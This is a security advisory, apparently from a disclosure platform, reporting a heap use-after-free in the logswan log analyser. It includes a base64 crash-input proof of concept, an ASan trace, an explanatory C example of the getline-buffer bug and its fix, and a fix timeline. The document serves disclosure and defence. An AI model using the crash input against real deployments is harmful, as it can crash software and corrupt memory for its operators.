Use After Free in fcambus/logswan

Reported on Nov 29th 2021
Good morning, I hope you're doing well today. Whilst testing logswan built with Clang 12 + ASan on Ubuntu 20.04.3 LTS from commit bcfd41, we discovered a heap-use-after-free situation during a strcmp operation on line 259 of logswan/src/logswan.c.

Proof of Concept

echo "MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAKMC4wLjAuMCAwIDBbMF0wIjA=" | base64 -d > /tmp/test.log
./logswan /tmp/test.log

Stack Trace:

==8152==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c000000051 at pc 0x00000026f5d2 bp 0x7ffcf50d1170 sp 0x7ffcf50d0918
READ of size 1 at 0x60c000000051 thread T0
    #0 0x26f5d1 in strcmp (/root/logswan/build/logswan+0x26f5d1)
    #1 0x30d473 in main /root/logswan/src/logswan.c:259:11
    #2 0x7fa42491f0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #3 0x25c7ad in _start (/root/logswan/build/logswan+0x25c7ad)

0x60c000000051 is located 17 bytes inside of 120-byte region [0x60c000000040,0x60c0000000b8)
freed by thread T0 here:
    #0 0x2d7d29 in realloc (/root/logswan/build/logswan+0x2d7d29)
    #1 0x7fa42497e71d in getdelim /build/glibc-eX1tMB/glibc-2.31/libio/iogetdelim.c:102:27
    #2 0x7fa424b1ba5f  (/lib/x86_64-linux-gnu/

previously allocated by thread T0 here:
    #0 0x2d7a0d in malloc (/root/logswan/build/logswan+0x2d7a0d)
    #1 0x7fa42497e6c3 in getdelim /build/glibc-eX1tMB/glibc-2.31/libio/iogetdelim.c:62:27
    #2 0x7fa424b1ba5f  (/lib/x86_64-linux-gnu/

SUMMARY: AddressSanitizer: heap-use-after-free (/root/logswan/build/logswan+0x26f5d1) in strcmp


This vulnerability can crash the software, corrupt the heap, and cause other unspecified issues that result from the software using memory after it has been freed.
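The ASan trace above tells a defender most of what they need: the region was allocated by malloc inside getdelim, freed by realloc inside getdelim (glibc implements getline on top of getdelim, and it reallocates the line buffer when a longer line arrives), and then read by strcmp. That is the signature of keeping a pointer into a getline() buffer across calls. The following is an added illustration of that pattern and its defensive fix; it is not logswan's code and makes no claim about what logswan.c line 259 actually does. The input is a constructed, deliberately simplified log where the client address is the first field; the 143-byte second line is there to force the 120-byte initial buffer (the size visible in the trace) to be grown.

```c
/* Added example, not logswan's code: why a pointer into a getline()
 * buffer must not outlive the next getline() call, and the safe pattern. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed sample input. The second line is 14 + 128 + 1 = 143 bytes,
 * longer than glibc's 120-byte initial getline() buffer, so reading it makes
 * getdelim() realloc() the buffer (the free site shown in the ASan trace). */
static const char SAMPLE_LOG[] =
    "10.0.0.1 GET /index.html\n"
    "10.0.0.1 GET /"
    "aaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaa"
    "aaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaa"
    "\n"
    "10.0.0.2 GET /index.html\n";

/* Unsafe pattern (shown for contrast only, never compiled or called here):
 *
 *   char *prev = NULL;
 *   while (getline(&line, &cap, fp) != -1) {
 *       char *ip = strtok(line, " \n");
 *       if (prev && strcmp(prev, ip) != 0)   // prev may already be freed
 *           changes++;
 *       prev = ip;   // points INTO `line`; the next getline() may realloc it
 *   }
 *
 * When getline() grows the buffer, realloc() frees the old block, `prev`
 * dangles, and the strcmp() on the following iteration reads freed memory,
 * which is exactly what AddressSanitizer reports as heap-use-after-free. */

/* Safe pattern: copy the field out of the line buffer before the next read,
 * so the comparison never depends on memory owned by getline(). Returns the
 * number of times the first field changes between consecutive lines, or -1
 * on allocation failure. */
int count_address_changes(FILE *fp)
{
    char *line = NULL;
    size_t cap = 0;
    char *prev = NULL;   /* our own copy, independent of getline()'s buffer */
    int changes = 0;

    while (getline(&line, &cap, fp) != -1) {
        char *save;
        char *ip = strtok_r(line, " \n", &save);
        if (ip == NULL)            /* blank line: nothing to compare */
            continue;
        if (prev != NULL && strcmp(prev, ip) != 0)
            changes++;
        free(prev);
        prev = strdup(ip);         /* own the bytes before the buffer can move */
        if (prev == NULL) {
            free(line);
            return -1;
        }
    }
    free(prev);
    free(line);
    return changes;
}

/* Convenience wrapper: run the scanner over an in-memory string. */
int count_address_changes_in(const char *text)
{
    FILE *fp = fmemopen((void *)text, strlen(text), "r");
    if (fp == NULL)
        return -1;
    int n = count_address_changes(fp);
    fclose(fp);
    return n;
}

int main(void)
{
    printf("address changes: %d\n", count_address_changes_in(SAMPLE_LOG));
    return 0;
}
```

Compiling this with `clang -fsanitize=address -g` and running it is clean; swapping the loop body for the commented unsafe version produces a trace with the same shape as the one in this report (strcmp reading a region freed by realloc under getdelim). The general rule is that any pointer derived from a getline()/getdelim() buffer is valid only until the next call that passes the same buffer pointer.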

Timeline:

We are processing your report and will contact the fcambus/logswan team within 24 hours.
We created a GitHub Issue asking the maintainers to create a
We have contacted a member of the fcambus/logswan team and are waiting to hear back.
Jamie Slome validated this vulnerability.
geeknik has been awarded the disclosure bounty.
The fix bounty is now up for grabs.
Jamie Slome marked this as fixed in 2.1.12 with commit c3fc63.
The fix bounty has been dropped.
This vulnerability will not receive a CVE.